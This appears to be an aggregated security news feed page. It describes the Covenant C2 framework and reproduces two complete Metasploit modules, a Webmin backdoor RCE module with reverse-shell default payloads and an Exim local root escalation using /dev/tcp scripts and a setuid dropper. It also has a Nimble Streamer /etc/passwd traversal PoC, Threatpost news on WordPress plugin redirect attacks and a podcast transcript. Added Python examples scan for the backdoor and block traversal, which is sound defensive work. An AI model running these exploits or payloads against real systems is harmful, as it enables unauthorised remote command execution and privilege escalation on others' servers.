An aggregate of all of GoVanguard’s InfoSec & Cybersecurity related Posts, News, Threats and Data Feeds.

Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers. Covenant is an ASP.NET Core, cross-platform application that includes a web-based interface that allows for multi-user collaboration.

Quick-Start Guide

Please see the Installation and Startup guide to get started with Covenant! The Wiki documents most of Covenant’s core features and how to use them.

Features

Covenant has several key features that make it useful and differentiate it from other command and control frameworks:

- Intuitive Interface – Covenant provides an intuitive web application to easily run a collaborative red team operation.
- Multi-Platform – Covenant targets .NET Core, which is multi-platform. This allows Covenant to run natively on Linux, MacOS, and Windows platforms. Additionally, Covenant has docker support, allowing it to run within a container on any system that has docker installed.
- Multi-User – Covenant supports multi-user collaboration. The ability to collaborate has become crucial for effective red team operations. Many users can interact with the same Covenant server and operate independently or collaboratively.
- API Driven – Covenant is driven by an API that enables multi-user collaboration and is easily extendible. Additionally, Covenant includes a Swagger UI that makes development and debugging easier and more convenient.
- Listener Profiles – Covenant supports listener “profiles” that control how the network communication between Grunt implants and Covenant listeners looks on the wire.
- Encrypted Key Exchange – Covenant implements an encrypted key exchange between Grunt implants and Covenant listeners that is largely based on a similar exchange in the Empire project, in addition to optional SSL encryption. This achieves the cryptographic property of forward secrecy between Grunt implants.
- Dynamic Compilation – Covenant uses the Roslyn API for dynamic C# compilation. Every time a new Grunt is generated or a new task is assigned, the relevant code is recompiled and obfuscated with ConfuserEx, avoiding totally static payloads. Covenant reuses much of the compilation code from the SharpGen project, which I described in much more detail in a previous post.
- Inline C# Execution – Covenant borrows code and ideas from both the SharpGen and SharpShell projects to allow operators to execute C# one-liners on Grunt implants. This allows for similar functionality to that described in the SharpShell post, but allows the one-liners to be executed on remote implants.
- Tracking Indicators – Covenant tracks “indicators” throughout an operation, and summarizes them in the Indicators menu. This allows an operator to conduct actions that are tracked throughout an operation and easily summarize those actions to the blue team during or at the end of an assessment for deconfliction and educational purposes. This feature is still in its infancy and still has room for improvement.
- Developed in C# – Personally, I enjoy developing in C#, which may not be a surprise for anyone that has read my latest blogs or tools. Not everyone might agree that development in C# is ideal, but hopefully everyone agrees that it is nice to have all components of the framework written in the same language. I’ve found it very convenient to write the server, client, and implant all in the same language. This may not be a true “feature”, but hopefully it allows others to contribute to the project fairly easily.

Questions and Discussion

Have questions or want to chat more about Covenant? Join the #Covenant channel in the BloodHound Gang Slack.

This Metasploit module exploits a backdoor in Webmin versions 1.890 through 1.920. Only the SourceForge downloads were backdoored, but they are listed as official downloads on the project’s site. Unknown attacker(s) inserted Perl qx statements into the build server’s source code on two separate occasions: once in April 2018, introducing the backdoor in the 1.890 release, and in July 2018, reintroducing the backdoor in releases 1.900 through 1.920. Only version 1.890 is exploitable in the default install. Later affected versions require the expired password changing feature to be enabled.

MD5 | a2360d86ccb3b9b45e1315630a785649

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Webmin password_change.cgi Backdoor',
      'Description' => %q{
        This module exploits a backdoor in Webmin versions 1.890 through 1.920.
        Only the SourceForge downloads were backdoored, but they are listed as
        official downloads on the project's site.

        Unknown attacker(s) inserted Perl qx statements into the build server's
        source code on two separate occasions: once in April 2018, introducing
        the backdoor in the 1.890 release, and in July 2018, reintroducing the
        backdoor in releases 1.900 through 1.920.

        Only version 1.890 is exploitable in the default install. Later affected
        versions require the expired password changing feature to be enabled.
      },
      'Author' => [
        'AkkuS', # (Özkan Mustafa Akkuş) Discovery and independent module
        'wvu' # This module and updated information about the backdoor
      ],
      'References' => [
        ['CVE', '2019-15107'], # y tho
        ['URL', 'http://www.webmin.com/exploit.html'],
        ['URL', 'https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html'],
        ['URL', 'https://blog.firosolutions.com/exploits/webmin/'],
        ['URL', 'https://github.com/webmin/webmin/issues/947']
      ],
      'DisclosureDate' => '2019-08-10',
      'License' => MSF_LICENSE,
      'Platform' => ['unix', 'linux'],
      'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
      'Privileged' => true,
      'Targets' => [
        ['Automatic (Unix In-Memory)',
          'Platform' => 'unix',
          'Arch' => ARCH_CMD,
          'Version' => [
            Gem::Version.new('1.890'), Gem::Version.new('1.920')
          ],
          'Type' => :unix_memory,
          'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'}
        ],
        ['Automatic (Linux Dropper)',
          'Platform' => 'linux',
          'Arch' => [ARCH_X86, ARCH_X64],
          'Version' => [
            Gem::Version.new('1.890'), Gem::Version.new('1.920')
          ],
          'Type' => :linux_dropper,
          'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'}
        ]
      ],
      'DefaultTarget' => 0,
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'Reliability' => [REPEATABLE_SESSION],
        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
      }
    ))

    register_options([
      Opt::RPORT(10000),
      OptString.new('TARGETURI', [true, 'Base path to Webmin', '/'])
    ])

    register_advanced_options([
      OptBool.new('ForceExploit', [false, 'Override check result', false])
    ])
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path)
    )

    unless res
      vprint_error('Server did not respond')
      return CheckCode::Unknown
    end

    # MiniServ is Webmin's web server; it reports the Webmin version in the Server header
    version =
      res.headers['Server'].to_s.scan(%r{MiniServ/([\d.]+)}).flatten.first

    unless version
      vprint_error('Webmin version not detected')
      return CheckCode::Unknown
    end

    version = Gem::Version.new(version)

    vprint_status("Webmin #{version} detected")
    checkcode = CheckCode::Detected

    unless version.between?(*target['Version'])
      vprint_error("Webmin #{version} is not a supported target")
      return CheckCode::Safe
    end

    vprint_good("Webmin #{version} is a supported target")
    checkcode = CheckCode::Appears

    res = execute_command("echo #{token}")

    unless res
      vprint_error('Webmin did not respond to check command')
      return checkcode
    end

    if res.body.include?('Password changing is not enabled!')
      vprint_error('Expired password changing disabled')
      return CheckCode::Safe
    end

    if res.body.include?(token)
      vprint_good('Webmin executed a benign check command')
      checkcode = CheckCode::Vulnerable
    else
      vprint_error('Webmin did not execute our check command')
      return CheckCode::Safe
    end

    checkcode
  end

  def exploit
    # These CheckCodes are allowed to pass automatically
    checkcodes = [
      CheckCode::Appears,
      CheckCode::Vulnerable
    ]

    unless checkcodes.include?(check) || datastore['ForceExploit']
      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
    end

    print_status("Configuring #{target.name} target")

    case target['Type']
    when :unix_memory
      print_status("Sending #{datastore['PAYLOAD']} command payload")
      vprint_status("Generated command payload: #{payload.encoded}")

      res = execute_command(payload.encoded)

      if res && datastore['PAYLOAD'] == 'cmd/unix/generic'
        print_warning('Dumping command output in full response body')

        if res.body.empty?
          print_error('Empty response body, no command output')
          return
        end

        print_line(res.body)
      end
    when :linux_dropper
      print_status("Sending #{datastore['PAYLOAD']} command stager")
      execute_cmdstager
    end
  end

=begin
wvu@kharak:~/Downloads$ diff3 webmin-1.{890,930,920}/password_change.cgi
====2
1:1c
3:1c
#!/usr/bin/perl
2:1c
#!/usr/local/bin/perl
====1
1:12c
$in{'expired'} eq '' || die $text{'password_expired'},qx/$in{'expired'}/;
2:12c
3:12c
$miniserv{'passwd_mode'} == 2 || die "Password changing is not enabled!";
====3
1:40c
2:40c
$enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'});
3:40c
$enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);
====3
1:200c
2:200c
# Show ok page
3:200c

wvu@kharak:~/Downloads$
=end
  def execute_command(cmd, _opts = {})
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
      'headers' => {'Referer' => full_uri},
      'vars_post' => {
        # 1.890
        'expired' => cmd,
        # 1.900-1.920
        'new1' => token,
        'new2' => token,
        'old' => cmd
      }
    }, 3.5)
  end

  def token
    @token ||= Rex::Text.rand_text_alphanumeric(8..42)
  end

end
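As an added example (not part of the Metasploit module or of Webmin's own code), a small scanner that looks for the two injected qx statements shown in the diff3 output above and reports which backdoor variant a password_change.cgi carries. The sample sources are constructed excerpts modelled on those diff lines, not copies of the real files.

```python
"""Scan a Webmin password_change.cgi for the injected Perl qx statements.

Added example; the signatures come from the diff3 output in the module's
comment block:
  1.890       : $in{'expired'} eq '' || die ..., qx/$in{'expired'}/;
  1.900-1.920 : ... &pass_error(..., qx/$in{'old'}/);
The later variant sits behind the passwd_mode == 2 gate, which is why the
page says those releases only expose the backdoor when expired password
changing is enabled; the scanner reports that gate as well.
"""
import re
from dataclasses import dataclass, field
from typing import List

# Perl qx// executing a request parameter: qx/$in{'name'}/ (either quote style or none)
QX_RE = re.compile(r"qx/\$in\{['\"]?(\w+)['\"]?\}/")
# The feature gate that precedes the 1.900-1.920 variant
GATE_RE = re.compile(r"\$miniserv\{'passwd_mode'\}\s*==\s*2")


@dataclass
class ScanResult:
    backdoored: bool
    variant: str                                   # '1.890', '1.900-1.920', 'unknown' or 'none'
    params: List[str] = field(default_factory=list)  # request params handed to qx
    lines: List[int] = field(default_factory=list)   # 1-based line numbers of hits
    gated_by_passwd_mode: bool = False


def scan_password_change(source: str) -> ScanResult:
    """Classify a password_change.cgi source text by the qx statements it contains."""
    result = ScanResult(backdoored=False, variant='none')
    for lineno, line in enumerate(source.splitlines(), start=1):
        if GATE_RE.search(line):
            result.gated_by_passwd_mode = True
        for match in QX_RE.finditer(line):
            result.backdoored = True
            result.params.append(match.group(1))
            result.lines.append(lineno)
    if 'expired' in result.params:
        result.variant = '1.890'
    elif 'old' in result.params:
        result.variant = '1.900-1.920'
    elif result.backdoored:
        result.variant = 'unknown'
    return result


# Constructed excerpts (three lines each) modelled on the diff3 output above.
SAMPLE_1890 = """#!/usr/bin/perl
$in{'expired'} eq '' || die $text{'password_expired'},qx/$in{'expired'}/;
$enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'});
"""
SAMPLE_1920 = """#!/usr/bin/perl
$miniserv{'passwd_mode'} == 2 || die "Password changing is not enabled!";
$enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);
"""
SAMPLE_1930 = """#!/usr/local/bin/perl
$miniserv{'passwd_mode'} == 2 || die "Password changing is not enabled!";
$enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'});
"""

if __name__ == '__main__':
    for name, src in (('1.890', SAMPLE_1890), ('1.920', SAMPLE_1920), ('1.930', SAMPLE_1930)):
        print(name, scan_password_change(src))
```

Point it at a real install with `scan_password_change(open(path).read())`; a hit on a non-SourceForge build would itself be worth investigating, since the page says only those downloads were affected.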


This Metasploit module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). Improper validation of the recipient address in the deliver_message() function in /src/deliver.c may lead to command execution with root privileges.

MD5 | 7e40628c1d0b1ff1461825cb7e5d4b58

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'expect'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation',
      'Description' => %q{
        This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).
        Improper validation of recipient address in deliver_message()
        function in /src/deliver.c may lead to command execution with root privileges
        (CVE-2019-10149).
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Qualys', # Discovery and PoC (@qualys)
          'Dennis Herrmann', # Working exploit (@dhn)
          'Marco Ivaldi', # Working exploit (@0xdea)
          'Guillaume André' # Metasploit module (@yaumn_)
        ],
      'DisclosureDate' => '2019-06-05',
      'Platform' => [ 'linux' ],
      'Arch' => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes' => [ 'shell', 'meterpreter' ],
      'Targets' =>
        [
          [
            'Exim 4.87 - 4.91',
            lower_version: Gem::Version.new('4.87'),
            upper_version: Gem::Version.new('4.91')
          ]
        ],
      'DefaultOptions' =>
        {
          'PrependSetgid' => true,
          'PrependSetuid' => true
        },
      'References' =>
        [
          [ 'CVE', '2019-10149' ],
          [ 'EDB', '46996' ],
          [ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ]
        ]
    ))

    register_options(
      [
        OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ])
      ])

    register_advanced_options(
      [
        OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),
        OptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]),
        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
      ])
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  # Hex-encode every byte of the command as \xNN so the string survives Exim's address parsing
  def encode_command(cmd)
    '\\x' + cmd.unpack('H2' * cmd.length).join('\\x')
  end

  def open_tcp_connection
    socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)
    params = Rex::Socket::Parameters.new({
      'PeerHost' => '127.0.0.1',
      'PeerPort' => datastore['EXIMPORT']
    })
    begin
      socket = socket_subsystem.create_tcp_client_channel(params)
    rescue => e
      vprint_error("Couldn't connect to port #{datastore['EXIMPORT']}, " \
                   "are you sure exim is listening on this port? (see EXIMPORT)")
      raise e
    end
    return socket_subsystem, socket
  end

  def inject_payload(payload)
    if session.type == 'meterpreter'
      socket_subsystem, socket = open_tcp_connection

      # SMTP dialogue: each line sent, then the reply code expected
      tcp_conversation = {
        nil => /220/,
        'helo localhost' => /250/,
        "MAIL FROM:" => /250/,
        "RCPT TO:" => /250/,
        'DATA' => /354/,
        'Received:' => nil,
        '.' => /250/
      }

      begin
        tcp_conversation.each do |line, pattern|
          Timeout.timeout(datastore['SendExpectTimeout']) do
            if line
              if line == 'Received:'
                for i in (1..31)
                  socket.puts("#{line} #{i}\n")
                end
              else
                socket.puts("#{line}\n")
              end
            end
            if pattern
              socket.expect(pattern)
            end
          end
        end
      rescue Rex::ConnectionError => e
        fail_with(Failure::Unreachable, e.message)
      rescue Timeout::Error
        fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')
      ensure
        socket.puts("QUIT\n")
        socket.close
        socket_subsystem.shutdown
      end
    else
      unless cmd_exec("/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' " \
                      "&& echo true").chomp.to_s == 'true'
        fail_with(Failure::NotFound, "Port #{datastore['EXIMPORT']} is closed")
      end

      bash_script = %|
        #!/bin/bash

        exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}
        read -u 3 && echo $REPLY
        echo "helo localhost" >&3
        read -u 3 && echo $REPLY
        echo "mail from:" >&3
        read -u 3 && echo $REPLY
        echo 'rcpt to:' >&3
        read -u 3 && echo $REPLY
        echo "data" >&3
        read -u 3 && echo $REPLY
        for i in $(seq 1 30); do
          echo 'Received: $i' >&3
        done
        echo "." >&3
        read -u 3 && echo $REPLY
        echo "quit" >&3
        read -u 3 && echo $REPLY
      |

      @bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
      write_file(@bash_script_path, bash_script)
      register_file_for_cleanup(@bash_script_path)
      chmod(@bash_script_path)
      cmd_exec("/bin/bash -c \"#{@bash_script_path}\"")
    end

    print_status('Payload sent, wait a few seconds...')
    Rex.sleep(5)
  end

  def check_for_bash
    unless command_exists?('/bin/bash')
      fail_with(Failure::NotFound, 'bash not found')
    end
  end

  def on_new_session(session)
    super

    if session.type == 'meterpreter'
      session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
      session.fs.file.rm(@payload_path)
    else
      session.shell_command_token("rm -f #{@payload_path}")
    end
  end

  def check
    if session.type == 'meterpreter'
      begin
        socket_subsystem, socket = open_tcp_connection
      rescue
        return CheckCode::Safe
      end
      res = socket.gets
      socket.close
      socket_subsystem.shutdown
    else
      check_for_bash
      res = cmd_exec("/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && " \
                     "(read -u 3 && echo $REPLY) || echo false'")
      if res == 'false'
        vprint_error("Couldn't connect to port #{datastore['EXIMPORT']}, " \
                     "are you sure exim is listening on this port? (see EXIMPORT)")
        return CheckCode::Safe
      end
    end

    # The 220 greeting carries the version, e.g. "220 host ESMTP Exim 4.91 ..."
    if res =~ /Exim ([0-9.]+)/i
      version = Gem::Version.new($1)
      vprint_status("Found exim version: #{version}")
      if version >= target[:lower_version] && version <= target[:upper_version]
        return CheckCode::Appears
      else
        return CheckCode::Safe
      end
    end

    CheckCode::Unknown
  end

  def exploit
    if is_root?
      unless datastore['ForceExploit']
        fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
      end
    end

    unless writable?(base_dir)
      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
    end

    if nosuid?(base_dir)
      fail_with(Failure::BadConfig, "#{base_dir} is mounted nosuid")
    end

    unless datastore['PrependSetuid'] && datastore['PrependSetgid']
      fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \
                                    'to get root privileges.')
    end

    if session.type == 'shell'
      check_for_bash
    end

    @payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
    write_file(@payload_path, payload.encoded_exe)
    register_file_for_cleanup(@payload_path)
    inject_payload(encode_command("/bin/sh -c 'chown root #{@payload_path};" \
                                  "chmod 4755 #{@payload_path}'"))

    unless setuid?(@payload_path)
      fail_with(Failure::Unknown, "Couldn't escalate privileges")
    end

    cmd_exec("#{@payload_path} & echo ")
  end
end


Researchers are warning of an ongoing campaign exploiting vulnerabilities in a slew of WordPress plugins. The campaign is redirecting traffic from victims’ websites to a number of potentially harmful locations. Impacted by the campaign is a plugin called Simple 301 Redirects – Addon – Bulk Uploader as well as several plugins made by developer NicDark (now rebranded as “Endreww”). All plugins have updates available resolving the vulnerabilities, but researchers in a Friday post warned that WordPress users should update as soon as possible to avoid attack.

“Redirect locations were a typical spread, whatever ad network is running it likely does some geolocation and tracking to decide where to send you,” Mikey Veenstra of Wordfence told Threatpost. “Most recent injections don’t even appear to be functional, suggesting some breakdown in infrastructure or a transition of some sort.”

Veenstra told Threatpost that exploitation began on or around July 31, just as the first disclosure for one of the vulnerabilities was published. “The plugin repository team quickly removed the rest of NicDark’s plugins from the repository, which drew attention and revealed that they all suffered similar vulnerabilities,” he told Threatpost. “So attacks probing for all of them began pretty quickly, despite many of the plugins having fairly small install bases.”

Vulnerabilities

Veenstra told Threatpost that he found at least five plugins by NicDark with flaws being exploited as part of the campaign. These plugins are: Components For WP Bakery Page Builder, Donations, Travel Management, Booking and Learning Courses. The flaws (all recently patched) are exploited by similar AJAX requests, according to Wordfence. In each case the plugin registers a nopriv_ AJAX action, which is responsible for importing various WordPress settings.

Unauthenticated visitors can successfully send these AJAX requests in order to modify the siteurl setting of the victim’s site, thus sending visitors to other locations. “The result of this modification is that all of the victim site’s scripts will attempt to load relative to that injected path,” researchers said. “In effect, this replaces all of a site’s loaded JavaScript with a file under the attacker’s control.”

The other impacted plugin, Simple 301 Redirects – Addon – Bulk Uploader, developed by Webcraftic, adds functionality to the Simple 301 Redirects plugin, which redirects requests to other pages. The plugin has more than 10,000 installations. It has a recently patched vulnerability that enables unauthenticated attackers to inject their own 301 redirect rules onto a victim’s website: a bad actor can upload a CSV file that imports a bulk set of site paths and redirect destinations. Ultimately, if a vulnerable site processes an uploaded malicious CSV file it will begin redirecting all of its traffic to the addresses provided.

Researchers said they have also identified related attacks against other formerly vulnerable plugins, including Woocommerce User Email Verification, Yellow Pencil Visual Theme Customizer, Coming Soon and Maintenance Mode, and Blog Designer. “The domains used by the attackers in performing these script injections and redirects rotate with some frequency. New domains appear every few days, and attacks involving older domains taper off,” researchers said. “At this time, many of the redirect domains associated with these attacks appear to have been decommissioned, despite the fact that these domains still show up in active attacks at the time of this writing.”

Plugins continue to be a security thorn in WordPress’ side. According to an Imperva report, almost all (98 percent) of WordPress vulnerabilities are related to plugins that extend the functionality and features of a website or blog. Other recent vulnerabilities found in WordPress plugins include WP Live Chat and Yuzo Related Posts.
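An added defender-side check, not from the Wordfence write-up: because the siteurl injection described above makes WordPress emit script tags that resolve under the attacker's path, an external monitor can compare the host of every script include against the expected host and alert on the change without database access. The page HTML, the victim host and the attacker-controlled host below are constructed placeholders.

```python
"""Flag <script src> URLs that do not load from the site's own host.

Added example. WordPress builds script URLs from the siteurl option, so after
the injection every enqueued script resolves under the attacker's host. The
check works on fetched HTML only, so it can run from outside the site.
"""
from html.parser import HTMLParser
from typing import List, Sequence
from urllib.parse import urljoin, urlsplit


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag (inline scripts have none)."""

    def __init__(self) -> None:
        super().__init__()
        self.srcs: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == 'script':
            src = dict(attrs).get('src')
            if src:
                self.srcs.append(src)


def foreign_scripts(page_url: str, html: str,
                    allowed_hosts: Sequence[str] = ()) -> List[str]:
    """Return absolute script URLs whose host is neither the page host nor allowed."""
    expected_host = urlsplit(page_url).hostname
    allowed = {expected_host, *(h.lower() for h in allowed_hosts)}
    parser = ScriptSrcCollector()
    parser.feed(html)
    flagged: List[str] = []
    for src in parser.srcs:
        absolute = urljoin(page_url, src)      # resolves '/path' and scheme-relative '//host/path'
        host = urlsplit(absolute).hostname     # lower-cased by urlsplit
        if host not in allowed:
            flagged.append(absolute)
    return flagged


# Constructed sample: a victim page whose siteurl was rewritten so the jQuery
# include now resolves under an attacker-controlled host (placeholder name).
PAGE_URL = 'https://victim-site.example/'
SAMPLE_HTML = """<html><head>
<script src="/wp-content/plugins/example/js/front.js?ver=1.0"></script>
<script type='text/javascript' src='//attacker-controlled.example/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script src="https://victim-site.example/wp-includes/js/wp-embed.min.js"></script>
<script src="https://cdn.example/lib.js"></script>
<script>console.log('inline, no src');</script>
</head><body></body></html>"""

if __name__ == '__main__':
    # cdn.example stands in for a CDN the site legitimately uses
    for url in foreign_scripts(PAGE_URL, SAMPLE_HTML, allowed_hosts=['cdn.example']):
        print('foreign script:', url)
```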


Nimble Streamer versions 3.0.2-2 up to 3.5.4-9 suffer from a directory traversal vulnerability.

MD5 | 87b6edb28bc7d0b0f16401f7be58e5ff

# Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal
# Exploit Author: MAYASEVEN
# Source at "https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/"
# Published on 08/04/2019
# Vendor Homepage at "https://wmspanel.com/nimble"
# Affected Version 3.0.2-2 to 3.5.4-9
# Tested on 3.5.4-9
# CVE-2019-11013 Nimble Streamer 3.0.2-2 to 3.5.4-9 Path Traversal
# Description: Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability.
# Successful exploitation could allow an attacker to traverse the file system to access
# files or directories that are outside of the restricted directory on the remote server.


PoC:
- http://somesite.com/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448
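An added example of the resolver-side mitigation for the traversal above, not Nimble Streamer's own code: the PoC path combines "../" segments with a NUL byte ("%00") so that a check on the ".mp4" suffix passes while the underlying open() stops at the NUL and reads /etc/passwd. The content root, suffix whitelist and file names are assumptions.

```python
"""Safe mapping of a client-supplied path onto a content directory (added example).

Order matters: percent-decode, reject NUL bytes, resolve against the content
root, confirm containment, and only then check the suffix. Checking the suffix
first is exactly what the '%00filename.mp4' trick in the PoC defeats.
"""
import os
from typing import NamedTuple, Optional
from urllib.parse import unquote

ALLOWED_SUFFIXES = ('.mp4', '.m3u8', '.ts')   # assumed media whitelist


class Resolution(NamedTuple):
    ok: bool
    reason: str
    path: Optional[str]   # real filesystem path when ok, else None


def resolve_media_path(root: str, user_path: str) -> Resolution:
    """Map a client-supplied path to a file under root, or say why it was refused."""
    decoded = unquote(user_path)                 # one level of %XX decoding (%2e, %00, ...)
    if '\x00' in decoded:
        return Resolution(False, 'NUL byte in path', None)
    root_real = os.path.realpath(root)
    # realpath collapses '..' and follows symlinks; the leading '/' is stripped so
    # an absolute client path cannot replace the root in the join.
    candidate = os.path.realpath(os.path.join(root_real, decoded.lstrip('/')))
    if os.path.commonpath([root_real, candidate]) != root_real:
        return Resolution(False, 'path escapes content root', None)
    if not candidate.lower().endswith(ALLOWED_SUFFIXES):
        return Resolution(False, 'suffix not allowed', None)
    return Resolution(True, 'ok', candidate)


# Constructed inputs; the root need not exist for the containment logic to run.
ROOT = '/srv/nimble-content'
POC_STYLE = '../../../../../../../../etc/passwd%00filename.mp4'   # shape of the PoC above

if __name__ == '__main__':
    for p in (POC_STYLE, '../../../../etc/passwd', '%2e%2e/%2e%2e/etc/passwd.mp4',
              'demo/file/clip.mp4', '/demo/file/clip.m3u8', 'demo/file/notes.txt'):
        print(f'{p!r:58} -> {resolve_media_path(ROOT, p)}')
```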


Why did Steam owner Valve say it made a “mistake” turning a researcher away from its bug bounty program? Who was behind a backdoor that was purposefully introduced into a utility utilized by Unix and Linux servers? And why is Facebook coming under fire for its “Clear History” feature?

Threatpost editors Lindsey O’Donnell and Tom Spring break down the top stories of the week that have the infosec space buzzing, including:

- A backdoor that was intentionally planted in Webmin in 2018 and found during the DEF CON 2019 security conference when researchers stumbled upon malicious code.
- A researcher disclosing a zero-day vulnerability (the second in two weeks) for the Steam gaming client after he said he was barred from the bug bounty program of Steam’s owner, Valve.
- Facebook being met with vitriol after users discovered its “Clear History” feature, rolled out in some countries this week, wasn’t what they had thought.

Below is a lightly edited transcript of the news wrap podcast.

Lindsey O’Donnell: I’m Lindsey O’Donnell with Threatpost, and I’m here today with Tom Spring to break down for you the top news of this week ended August 22. Tom, thanks for joining the Threatpost podcast today. How are you doing today?

Tom Spring: I’m doing great. Thanks for asking.

LO: Good. Well, we’re just ending a big week. But we should probably talk about one of the biggest stories that you wrote about that garnered the most interest for a lot of Threatpost readers, which was the backdoor that was discovered on the Webmin utility for Unix servers. That was a really interesting story.

TS: Yeah, it just goes to show you how susceptible some of these libraries are to manipulation and the clever way that people are now abusing – whether it be a repository or whether it be a Git library – it’s really spooky, this backdoor that was found, just recently, a couple weeks ago. I should say, even just earlier this week. It’s been an evolving story.

It touches on DEF CON and touches on zero days. But in a nutshell, you’re right, there was a backdoor found in this utility for Linux and Unix servers, called Webmin that could give attackers basically control over their servers, and it was sort of a worst case scenario. But what’s interesting about it is the seeds of this attack, of this vulnerability, were planted in – I believe it was April 2018 – I’m not too sure of the month. But it was last year, there was a library that was put into the code that is behind this Webmin tool, and they backdated it, and it kind of existed and it was not exploited, and if I understand things correctly, it went unnoticed for almost a year. And then during DEF CON, what happened was researchers were looking at the code for Webmin, and they discovered a way to exploit the utility, using the vulnerability found in a CGI script “password change”. And that was the first red flag that led to more attention to what was going on with this script, and what they discovered was that it was not a mistake and it was intentionally inserted into GitHub, and it was backdated as several versions of the Webmin went out to users. And then you know, sort of everything unraveled, they patched it, it has a happy ending. And now, I think the patches went out, the community is aware, the Webmin utility has been fixed. Obviously, there’s probably a number of different, there’s probably a percentage that hasn’t been patched yet. But I think there’s a lot of awareness around this problem. But we’ve gotten some comments on the story asking about who’s behind this.

It’s one thing to say, “Okay, well, we understand what happened, but who is behind inserting this malicious code?” And then the other feedback that we’ve been getting on this story is, is just how difficult it is to rely on one set of eyes, or even a couple set of eyes in terms of looking at code, and making sure it’s secure, and not trusting a lot of these commits to make sure that they’re saying like, that it’s not a foregone conclusion that it’s secure. And it’s, I think it’s really kicked up quite a bit of discussion within the open source community in terms of how to handle problems like this and we see a lot of this within repositories in terms of malicious code, or just bad code reuse, in terms of libraries with software developers, it really is a tremendous challenge. And I think this was a really interesting example of how this can be abused by a malicious actor.

LO: Did Webmin give any indication about what it might change in the future to stop something like this from happening again? Or is that up to speculation at this point about what can be done?

TS: Well, so they’re going to be updating their build process to use checked in code from GitHub, rather than a local directory that is kept in sync – that had a lot to do with how this was overlooked. They’re going to be – these are suggestions for users as well – rotating all passwords and keys accessible from old build systems and auditing all GitHub check ins over the past year to look for commits that may have introduced similar vulnerabilities. So, like I said, again, you hear a lot about the preventative measures that are being taken that are taking place to prevent these things from happening in the future. We’re seeing more code dependency, more norm code reuse dependency.

And I think we’ll probably hear about more tools, more solutions, and repositories talking more about making noise about how they’re making sure that what they’re doing is better than what other repositories are doing to keep things safe.

LO: Right. Yeah, for sure. Well, I wrote an interesting story too this week. So I covered an ongoing story that Tara actually reported first last week, and that we chatted about on last week’s news wrap; Tom, if you remember the zero day that was discovered in Steam by a researcher last week.

TS: Yeah.

LO: So that story has continued into an entire whirlwind of drama this week. The researcher said that he was barred from Steam’s owner, Valve’s, bug bounty program after disclosing that initial zero day vulnerability for the Steam gaming client. And then on the heels of that he also disclosed another zero day privilege escalation vulnerability. So it was a little crazy. And then, just last night, Thursday evening, according to reports, after all that, Valve patched the recent Steam zero day, and essentially called turning away this researcher who had found the zero days a big mistake, and they updated their bug bounty program to address the issue.

TS: And Lindsey, was this was this HackerOne? I’m just trying to figure out who’s actually apologetic for what essentially, it seems like getting this this researcher angry.

